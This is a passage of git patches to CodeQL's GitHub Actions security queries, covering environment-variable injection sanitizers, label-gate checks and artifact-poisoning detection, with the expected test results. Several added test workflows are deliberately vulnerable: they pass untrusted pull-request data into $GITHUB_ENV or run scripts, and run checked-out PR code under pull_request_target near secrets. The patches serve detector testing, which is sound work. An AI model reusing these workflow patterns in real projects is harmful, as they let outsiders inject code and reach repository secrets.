["pull_request_comment", "github.event.comment"] - ["pull_request_comment", "github.event.pull_request"] - ["pull_request_comment", "github.head_ref"] diff --git a/ql/lib/ext/config/externally_triggereable_events.yml b/ql/lib/ext/config/externally_triggereable_events.yml index c3481c1cca5..7d40620e913 100644 --- a/ql/lib/ext/config/externally_triggereable_events.yml +++ b/ql/lib/ext/config/externally_triggereable_events.yml @@ -9,7 +9,6 @@ extensions: - ["watch"] - ["issue_comment"] - ["issues"] - - ["pull_request"] # non-privileged - ["pull_request_comment"] - ["pull_request_review"] - ["pull_request_review_comment"] From 315ffdff8d64e99fa6a247c7fd21f9da92d4607d Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 23 Oct 2024 12:15:54 +0200 Subject: [PATCH 0618/1267] Improve env var injection sanitizers --- .../actions/security/EnvVarInjectionQuery.qll | 49 ++++++++++++------- 1 file changed, 30 insertions(+), 19 deletions(-) diff --git a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll index 99e9537a857..656ea1207b5 100644 --- a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll @@ -10,7 +10,7 @@ string sanitizerCommand() { result = [ "tr\\s+(-d\\s*)?('|\")?.n('|\")?", // tr -d '\n' ' ', tr '\n' ' ' - "tr\\s+-cd\\s+.*:alpha:", // tr -cd '[:alpha:_]' + "tr\\s+-cd\\s+.*:al(pha|num):", // tr -cd '[:alpha:_]' "(head|tail)\\s+-n\\s+1" // head -n 1, tail -n 1 ] } @@ -55,18 +55,23 @@ class EnvVarInjectionFromFileReadSink extends EnvVarInjectionSink { * echo "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV */ class EnvVarInjectionFromCommandSink extends EnvVarInjectionSink { + CommandSource inCommand; + string injectedVar; + string command; + EnvVarInjectionFromCommandSink() { - exists(CommandSource source, Run run, string var | - this.asExpr() = source.getEnclosingRun().getScript() and - run = source.getEnclosingRun() and - run.getScript().getACmdReachingGitHubEnvWrite(source.getCommand(), var) and + exists(Run run | + this.asExpr() = inCommand.getEnclosingRun().getScript() and + run = inCommand.getEnclosingRun() and + run.getScript().getACmdReachingGitHubEnvWrite(inCommand.getCommand(), injectedVar) and ( - not run.getScript().getACmdReachingGitHubEnvWrite(_, var) + // the source flows to the injected variable without any command in between + not run.getScript().getACmdReachingGitHubEnvWrite(_, injectedVar) and + command = "" or - exists(string sanitizer | - run.getScript().getACmdReachingGitHubEnvWrite(sanitizer, var) and - not exists(sanitizer.regexpFind(sanitizerCommand(), _, _)) - ) + // the source flows to the injected variable with a command in between + run.getScript().getACmdReachingGitHubEnvWrite(command, injectedVar) and + not command.regexpMatch(".*" + sanitizerCommand() + ".*") ) ) } @@ -81,18 +86,24 @@ class EnvVarInjectionFromCommandSink extends EnvVarInjectionSink { * echo "FOO=$BODY" >> $GITHUB_ENV */ class EnvVarInjectionFromEnvVarSink extends EnvVarInjectionSink { + string inVar; + string injectedVar; + string command; + EnvVarInjectionFromEnvVarSink() { - exists(Run run, string var_name, string var | - exists(run.getInScopeEnvVarExpr(var_name)) and + exists(Run run | run.getScript() = this.asExpr() and - run.getScript().getAnEnvReachingGitHubEnvWrite(var_name, var) and + exists(run.getInScopeEnvVarExpr(inVar)) and + run.getScript().getAnEnvReachingGitHubEnvWrite(inVar, injectedVar) and ( - not run.getScript().getACmdReachingGitHubEnvWrite(_, var) + // the source flows to the injected variable without any command in between + not run.getScript().getACmdReachingGitHubEnvWrite(_, injectedVar) and + command = "" or - exists(string sanitizer | - run.getScript().getACmdReachingGitHubEnvWrite(sanitizer, var) and - not exists(sanitizer.regexpFind(sanitizerCommand(), _, _)) - ) + // the source flows to the injected variable with a command in between + run.getScript().getACmdReachingGitHubEnvWrite(_, injectedVar) and + run.getScript().getACmdReachingGitHubEnvWrite(command, injectedVar) and + not command.regexpMatch(".*" + sanitizerCommand() + ".*") ) ) } @@ -122,7 +133,7 @@ class EnvVarInjectionFromMaDSink extends EnvVarInjectionSink { private module EnvVarInjectionConfig implements DataFlow::ConfigSig { predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource and - not source.(RemoteFlowSource).getSourceType() = "branch" + not source.(RemoteFlowSource).getSourceType() = ["branch", "username"] } predicate isSink(DataFlow::Node sink) { sink instanceof EnvVarInjectionSink } From 43211d3286372f83747258215fb225e6c229a8ca Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 23 Oct 2024 12:16:02 +0200 Subject: [PATCH 0619/1267] Update tests --- .../CWE-077/.github/workflows/test17.yml | 36 +++++++++++++++++ .../CWE-077/.github/workflows/test18.yml | 32 +++++++++++++++ .../CWE-077/.github/workflows/test19.yml | 40 +++++++++++++++++++ .../CWE-094/.github/workflows/test20.yml | 19 +++++++++ .../CWE-094/CodeInjectionCritical.expected | 1 - .../CWE-094/CodeInjectionMedium.expected | 2 - 6 files changed, 127 insertions(+), 3 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-077/.github/workflows/test17.yml create mode 100644 ql/test/query-tests/Security/CWE-077/.github/workflows/test18.yml create mode 100644 ql/test/query-tests/Security/CWE-077/.github/workflows/test19.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/test20.yml diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test17.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/test17.yml new file mode 100644 index 00000000000..dbf8c94b308 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/test17.yml @@ -0,0 +1,36 @@ +on: + push: + branches: [main] + workflow_dispatch: + inputs: + pypi: + type: boolean + description: Publish + +jobs: + publish: + runs-on: ubuntu-latest + permissions: + id-token: write + steps: + - name: Checkout code + uses: actions/checkout@v4 + with: + token: ${{ secrets._GITHUB_TOKEN }} + - name: Extract PR Details + env: + GH_TOKEN: ${{ secrets._GITHUB_TOKEN }} + run: | + # Check if the event is a pull request or pull_request_target + if [ "${{ github.event_name }}" = "pull_request" ] || [ "${{ github.event_name }}" = "pull_request_target" ]; then + PR_NUMBER=${{ github.event.pull_request.number }} + PR_TITLE=$(gh pr view $PR_NUMBER --json title --jq '.title') + else + # Use gh to find the PR associated with the commit + COMMIT_SHA=${{ github.event.after }} + PR_JSON=$(gh pr list --search "${COMMIT_SHA}" --state merged --json number,title --jq '.[0]') + PR_NUMBER=$(echo $PR_JSON | jq -r '.number') + PR_TITLE=$(echo $PR_JSON | jq -r '.title') + fi + echo "PR_NUMBER=$PR_NUMBER" >> $GITHUB_ENV + echo "PR_TITLE=$PR_TITLE" >> $GITHUB_ENV diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test18.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/test18.yml new file mode 100644 index 00000000000..1c4b1e86312 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/test18.yml @@ -0,0 +1,32 @@ +on: + schedule: + - cron: '0 0 * * *' + pull_request: + types: [ opened, synchronize, reopened ] + branches: ["master", "*-rc"] + workflow_dispatch: + +jobs: + tests: + runs-on: ubuntu-latest + steps: + - name: Checkout Repository + uses: actions/checkout@692973e3d937129bcbf40652eb9f2f61becf3332 # v4 + + - name: Set Branch Variables + id: set-branch-variables + env: + github_event_pull_request_head_repo_owner_login: ${{ github.event.pull_request.head.repo.owner.login }} + github_repository_owner: ${{ github.repository_owner }} + run: | + # Set the Repo Owner + REPO_OWNER="${github_event_pull_request_head_repo_owner_login:-$github_repository_owner}" + echo "REPO_OWNER=$REPO_OWNER" >> $GITHUB_ENV + - name: Sanitize Github Variables + id: sanitize-github-variables + env: + GITHUB_EVENT_PULL_REQUEST_TITLE: ${{ github.event.pull_request.title }} + run: | + # Delete non-alphanumeric characters and limit to 75 chars which is the branch title limit in GitHub + SAFE_PULL_REQUEST_TITLE=$(echo "${GITHUB_EVENT_PULL_REQUEST_TITLE}" | tr -cd '[:alnum:]_ -' | cut -c1-75) + echo "SAFE_PULL_REQUEST_TITLE=$SAFE_PULL_REQUEST_TITLE" >> $GITHUB_ENV diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test19.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/test19.yml new file mode 100644 index 00000000000..3b3b4b99ca1 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/test19.yml @@ -0,0 +1,40 @@ +on: + pull_request: + workflow_dispatch: + +jobs: + build: + if: ${{ github.repository_owner == 'test' }} + runs-on: ubuntu-latest + steps: + - name: Get the appropriate Endo branch + id: branch + uses: actions/github-script@v7 + with: + result-encoding: string + script: |- + let branch = 'NOPE'; + if (context.payload.pull_request) { + const { body } = context.payload.pull_request; + const regex = /^\#endo-branch:\s+(\S+)/m; + const result = regex.exec(body); + if (result) { + branch = result[1]; + } + } + return branch; + - name: check out + id: checkout + if: steps.branch.outputs.result != 'NOPE' + uses: actions/checkout@v4 + with: + repository: test/test + path: ./tmp + ref: ${{ steps.branch.outputs.result }} + clean: 'false' + submodules: 'true' + persist-credentials: false + + - name: Find Netlify site ID + run: | + echo "NETLIFY_SITE_ID=$(cat COVERAGE_NETLIFY_SITE_ID)" >> $GITHUB_ENV diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test20.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test20.yml new file mode 100644 index 00000000000..27d8a666fc9 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test20.yml @@ -0,0 +1,19 @@ + +on: [ workflow_dispatch, pull_request ] +jobs: + test: + runs-on: ubuntu-20.04 + steps: + - name: Preliminary Information + run: | + echo "The job was automatically triggered by a ${{ github.event_name }} event." + echo "This job is now running on a ${{ runner.os }} server hosted by GitHub!" + echo "The name of your branch is ${{ github.ref }} and your repository is ${{ github.repository }}." + echo " " + echo "github.ref = ${{ github.ref }}" + echo "github.sha = ${{ github.sha }}" + echo "github.event.pull_request.head.ref = ${{ github.event.pull_request.head.ref }}" + echo "github.event.pull_request.head.sha = ${{ github.event.pull_request.head.sha }}" + echo "github.event.pull_request.base.ref = ${{ github.event.pull_request.base.ref }}" + echo "github.event.pull_request.base.sha = ${{ github.event.pull_request.base.sha }}" + echo " " diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index 8a134a6f7ef..dd9836805bd 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected @@ -360,7 +360,6 @@ nodes | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | semmle.label | github.event.issue.body | | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | -| .github/workflows/priv_pull_request.yml:14:21:14:57 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | semmle.label | github.event.pull_request.head.label | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index 6afef323ff0..4a561f26cb2 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected @@ -360,7 +360,6 @@ nodes | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | semmle.label | github.event.issue.body | | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | -| .github/workflows/priv_pull_request.yml:14:21:14:57 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | semmle.label | github.event.pull_request.head.label | @@ -628,7 +627,6 @@ subpaths | .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | .github/workflows/inter-job1.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | | .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | .github/workflows/inter-job2.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | | .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | .github/workflows/inter-job4.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | -| .github/workflows/priv_pull_request.yml:14:21:14:57 | github.event.pull_request.body | .github/workflows/priv_pull_request.yml:14:21:14:57 | github.event.pull_request.body | .github/workflows/priv_pull_request.yml:14:21:14:57 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/priv_pull_request.yml:14:21:14:57 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | ${{ github.event.commits[11].message }} | | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | ${{ github.event.commits[11].author.email }} | | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | ${{ github.event.commits[11].author.name }} | From 9a0795cc754de717b10dc7e5e2df4a6472d728ce Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 23 Oct 2024 12:16:32 +0200 Subject: [PATCH 0620/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 608e186ffcd..1af220ff8fb 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.74 +version: 0.1.75 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index cdd396f985c..e8098e4f215 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.74 +version: 0.1.75 groups: [actions, queries] suites: codeql-suites extractor: javascript From 674afc5eddb9202def8860e2bd474541c960b6a2 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 23 Oct 2024 15:48:42 +0200 Subject: [PATCH 0621/1267] Improve labelgate accuracy --- .../codeql/actions/security/ControlChecks.qll | 16 ++++++----- ...eckout.yml => label_trusted_checkout1.yml} | 0 .../workflows/label_trusted_checkout2.yml | 28 +++++++++++++++++++ .../CWE-829/UnpinnedActionsTag.expected | 6 ++-- .../UntrustedCheckoutCritical.expected | 13 ++++++--- 5 files changed, 50 insertions(+), 13 deletions(-) rename ql/test/query-tests/Security/CWE-829/.github/workflows/{label_trusted_checkout.yml => label_trusted_checkout1.yml} (100%) create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/label_trusted_checkout2.yml diff --git a/ql/lib/codeql/actions/security/ControlChecks.qll b/ql/lib/codeql/actions/security/ControlChecks.qll index 9b50a14bca2..c73b06ae530 100644 --- a/ql/lib/codeql/actions/security/ControlChecks.qll +++ b/ql/lib/codeql/actions/security/ControlChecks.qll @@ -159,14 +159,16 @@ abstract class CommentVsHeadDateCheck extends ControlCheck { /* Specific implementations of control checks */ class LabelIfCheck extends LabelCheck instanceof If { + string condition; + LabelIfCheck() { - // eg: contains(github.event.pull_request.labels.*.name, 'safe to test') - // eg: github.event.label.name == 'safe to test' - exists( - normalizeExpr(this.getCondition()) - .regexpFind([ - "\\bgithub\\.event\\.pull_request\\.labels\\b", "\\bgithub\\.event\\.label\\.name\\b" - ], _, _) + condition = normalizeExpr(this.getCondition()) and + ( + // eg: contains(github.event.pull_request.labels.*.name, 'safe to test') + condition.regexpMatch("(^|[^!])contains\\(\\s*github\\.event\\.pull_request\\.labels\\b.*") + or + // eg: github.event.label.name == 'safe to test' + condition.regexpMatch(".*\\bgithub\\.event\\.label\\.name\\s*==.*") ) } } diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/label_trusted_checkout.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/label_trusted_checkout1.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/label_trusted_checkout.yml rename to ql/test/query-tests/Security/CWE-829/.github/workflows/label_trusted_checkout1.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/label_trusted_checkout2.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/label_trusted_checkout2.yml new file mode 100644 index 00000000000..6014d08ed80 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/label_trusted_checkout2.yml @@ -0,0 +1,28 @@ +on: + pull_request_target: + types: [labeled] + +jobs: + build: + name: Build and test + runs-on: ubuntu-latest + if: | + !contains(github.event.pull_request.labels.*.name, 'safe to test') + steps: + - uses: actions/checkout@v2 + with: + ref: ${{ github.event.pull_request.head.sha }} + + - uses: actions/setup-node@v1 + - run: | + npm install + npm build + + - uses: completely/fakeaction@v2 + with: + arg1: ${{ secrets.supersecret }} + + - uses: fakerepo/comment-on-pr@v1 + with: + message: | + Thank you! diff --git a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected index 58a000efac4..0457fd7afaa 100644 --- a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected +++ b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected @@ -13,8 +13,10 @@ | .github/workflows/issue_comment_octokit.yml:13:15:13:41 | octokit/request-action@v2.x | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.x', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:12:9:19:6 | Uses Step: fetch_issue | Uses Step: fetch_issue | | .github/workflows/issue_comment_octokit.yml:20:15:20:41 | octokit/request-action@v2.x | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.x', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:19:9:26:6 | Uses Step: fetch_pr | Uses Step: fetch_pr | | .github/workflows/issue_comment_octokit.yml:104:15:104:43 | octokit/request-action@v2.0.2 | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.0.2', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:103:9:109:6 | Uses Step: request | Uses Step: request | -| .github/workflows/label_trusted_checkout.yml:20:13:20:36 | completely/fakeaction@v2 | Unpinned 3rd party Action 'label_trusted_checkout.yml' step $@ uses 'completely/fakeaction' with ref 'v2', not a pinned commit hash | .github/workflows/label_trusted_checkout.yml:20:7:24:4 | Uses Step | Uses Step | -| .github/workflows/label_trusted_checkout.yml:24:13:24:37 | fakerepo/comment-on-pr@v1 | Unpinned 3rd party Action 'label_trusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref 'v1', not a pinned commit hash | .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | Uses Step | +| .github/workflows/label_trusted_checkout1.yml:20:13:20:36 | completely/fakeaction@v2 | Unpinned 3rd party Action 'label_trusted_checkout1.yml' step $@ uses 'completely/fakeaction' with ref 'v2', not a pinned commit hash | .github/workflows/label_trusted_checkout1.yml:20:7:24:4 | Uses Step | Uses Step | +| .github/workflows/label_trusted_checkout1.yml:24:13:24:37 | fakerepo/comment-on-pr@v1 | Unpinned 3rd party Action 'label_trusted_checkout1.yml' step $@ uses 'fakerepo/comment-on-pr' with ref 'v1', not a pinned commit hash | .github/workflows/label_trusted_checkout1.yml:24:7:27:21 | Uses Step | Uses Step | +| .github/workflows/label_trusted_checkout2.yml:21:13:21:36 | completely/fakeaction@v2 | Unpinned 3rd party Action 'label_trusted_checkout2.yml' step $@ uses 'completely/fakeaction' with ref 'v2', not a pinned commit hash | .github/workflows/label_trusted_checkout2.yml:21:7:25:4 | Uses Step | Uses Step | +| .github/workflows/label_trusted_checkout2.yml:25:13:25:37 | fakerepo/comment-on-pr@v1 | Unpinned 3rd party Action 'label_trusted_checkout2.yml' step $@ uses 'fakerepo/comment-on-pr' with ref 'v1', not a pinned commit hash | .github/workflows/label_trusted_checkout2.yml:25:7:28:21 | Uses Step | Uses Step | | .github/workflows/level0.yml:36:15:36:47 | rlespinasse/github-slug-action@v4 | Unpinned 3rd party Action 'Poutine Level 0' step $@ uses 'rlespinasse/github-slug-action' with ref 'v4', not a pinned commit hash | .github/workflows/level0.yml:36:9:39:6 | Uses Step | Uses Step | | .github/workflows/mend.yml:31:15:31:34 | ruby/setup-ruby@v1 | Unpinned 3rd party Action 'Test' step $@ uses 'ruby/setup-ruby' with ref 'v1', not a pinned commit hash | .github/workflows/mend.yml:29:9:33:28 | Uses Step | Uses Step | | .github/workflows/pr-workflow.yml:60:15:60:52 | amannn/action-semantic-pull-request@v5 | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'amannn/action-semantic-pull-request' with ref 'v5', not a pinned commit hash | .github/workflows/pr-workflow.yml:60:9:70:6 | Uses Step | Uses Step | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 1ed39f73a48..6b273518167 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected @@ -101,10 +101,14 @@ edges | .github/workflows/issue_comment_octokit.yml:66:9:79:6 | Uses Step: sha | .github/workflows/issue_comment_octokit.yml:79:9:83:2 | Uses Step | | .github/workflows/issue_comment_octokit.yml:87:9:95:6 | Uses Step: sha | .github/workflows/issue_comment_octokit.yml:95:9:100:2 | Uses Step | | .github/workflows/issue_comment_octokit.yml:103:9:109:6 | Uses Step: request | .github/workflows/issue_comment_octokit.yml:109:9:114:66 | Uses Step | -| .github/workflows/label_trusted_checkout.yml:11:7:15:4 | Uses Step | .github/workflows/label_trusted_checkout.yml:15:7:16:4 | Uses Step | -| .github/workflows/label_trusted_checkout.yml:15:7:16:4 | Uses Step | .github/workflows/label_trusted_checkout.yml:16:7:20:4 | Run Step | -| .github/workflows/label_trusted_checkout.yml:16:7:20:4 | Run Step | .github/workflows/label_trusted_checkout.yml:20:7:24:4 | Uses Step | -| .github/workflows/label_trusted_checkout.yml:20:7:24:4 | Uses Step | .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | +| .github/workflows/label_trusted_checkout1.yml:11:7:15:4 | Uses Step | .github/workflows/label_trusted_checkout1.yml:15:7:16:4 | Uses Step | +| .github/workflows/label_trusted_checkout1.yml:15:7:16:4 | Uses Step | .github/workflows/label_trusted_checkout1.yml:16:7:20:4 | Run Step | +| .github/workflows/label_trusted_checkout1.yml:16:7:20:4 | Run Step | .github/workflows/label_trusted_checkout1.yml:20:7:24:4 | Uses Step | +| .github/workflows/label_trusted_checkout1.yml:20:7:24:4 | Uses Step | .github/workflows/label_trusted_checkout1.yml:24:7:27:21 | Uses Step | +| .github/workflows/label_trusted_checkout2.yml:12:7:16:4 | Uses Step | .github/workflows/label_trusted_checkout2.yml:16:7:17:4 | Uses Step | +| .github/workflows/label_trusted_checkout2.yml:16:7:17:4 | Uses Step | .github/workflows/label_trusted_checkout2.yml:17:7:21:4 | Run Step | +| .github/workflows/label_trusted_checkout2.yml:17:7:21:4 | Run Step | .github/workflows/label_trusted_checkout2.yml:21:7:25:4 | Uses Step | +| .github/workflows/label_trusted_checkout2.yml:21:7:25:4 | Uses Step | .github/workflows/label_trusted_checkout2.yml:25:7:28:21 | Uses Step | | .github/workflows/level0.yml:33:9:36:6 | Uses Step | .github/workflows/level0.yml:36:9:39:6 | Uses Step | | .github/workflows/level0.yml:36:9:39:6 | Uses Step | .github/workflows/level0.yml:39:9:52:2 | Run Step: check_profanities | | .github/workflows/level0.yml:62:9:65:6 | Uses Step | .github/workflows/level0.yml:65:9:86:2 | Uses Step | @@ -310,6 +314,7 @@ edges | .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | .github/workflows/auto_ci.yml | | .github/workflows/dependabot3.yml:25:9:48:6 | Run Step: set-milestone | .github/workflows/dependabot3.yml:15:9:20:6 | Uses Step | .github/workflows/dependabot3.yml:25:9:48:6 | Run Step: set-milestone | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/dependabot3.yml:3:5:3:23 | pull_request_target | .github/workflows/dependabot3.yml | | .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | .github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/gitcheckout.yml:2:3:2:21 | pull_request_target | .github/workflows/gitcheckout.yml | +| .github/workflows/label_trusted_checkout2.yml:17:7:21:4 | Run Step | .github/workflows/label_trusted_checkout2.yml:12:7:16:4 | Uses Step | .github/workflows/label_trusted_checkout2.yml:17:7:21:4 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/label_trusted_checkout2.yml:2:3:2:21 | pull_request_target | .github/workflows/label_trusted_checkout2.yml | | .github/workflows/level0.yml:107:9:112:2 | Run Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/level0.yml:3:3:3:8 | issues | .github/workflows/level0.yml | | .github/workflows/level0.yml:107:9:112:2 | Run Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/level0.yml:5:3:5:15 | issue_comment | .github/workflows/level0.yml | | .github/workflows/level0.yml:107:9:112:2 | Run Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/level0.yml:7:3:7:21 | pull_request_target | .github/workflows/level0.yml | From ae6309daf6245078e328425a241ee34e7f9be250 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 23 Oct 2024 22:02:58 +0200 Subject: [PATCH 0622/1267] Account for tar -C option to specify path --- .../security/ArtifactPoisoningQuery.qll | 14 +++---- .../CWE-829/.github/workflows/test25.yml | 42 +++++++++++++++++++ .../ArtifactPoisoningCritical.expected | 4 ++ .../CWE-829/ArtifactPoisoningMedium.expected | 3 ++ .../UntrustedCheckoutCritical.expected | 3 ++ 5 files changed, 59 insertions(+), 7 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/test25.yml diff --git a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll index 48bca0e46f9..56f36316487 100644 --- a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll @@ -4,9 +4,9 @@ import codeql.actions.DataFlow import codeql.actions.dataflow.FlowSources import codeql.actions.security.PoisonableSteps -string unzipRegexp() { result = ".*(unzip|tar)\\s+.*" } +string unzipRegexp() { result = "(unzip|tar)\\s+.*" } -string 